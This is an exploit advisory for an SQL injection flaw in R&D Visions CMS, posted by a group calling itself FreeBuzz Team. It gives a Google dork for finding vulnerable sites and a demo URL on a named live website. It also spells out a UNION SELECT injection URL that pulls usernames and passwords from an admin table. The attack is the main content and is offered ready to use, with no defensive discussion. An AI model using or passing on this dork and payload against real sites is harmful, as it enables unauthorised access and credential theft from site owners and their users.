--------------------------------------------------------- # Exploit Title: R&D Visions CMS - SQL Injection Vulnerability # Date: 2019-11-14 # Exploit Author: FreeBuzz Team # Vendor Homepage: http://www.websmileindia.com/ # Team Mail : Frb@tutamail.com # Tested on: Ubuntu --------------------------------------------------------- Google Dork: intext:"Website by R&D Visions" inurl:.php?id= intext:"CMS System by R&D Visions" - Demo: https://www.drunvalo.net/home.php?newid=53[SQLi] Injection: https://www.drunvalo.net/home.php?newid=-53+Union+Select+1,Group_ConCat(user,0x3a,pass),3,4,5,6,7,8,9,10,11,12+From+admin_user_log--+ ---------------------------------------------------------- # Discovered by Unkn0wn[0x9a@protonmail.com] # https://github.com/0x9a # We Are : AloneGhost - VeNoM - Agent Haze - Old_One - Unkn0wn FreeBuzz Team @ 2012-2019 [FRB]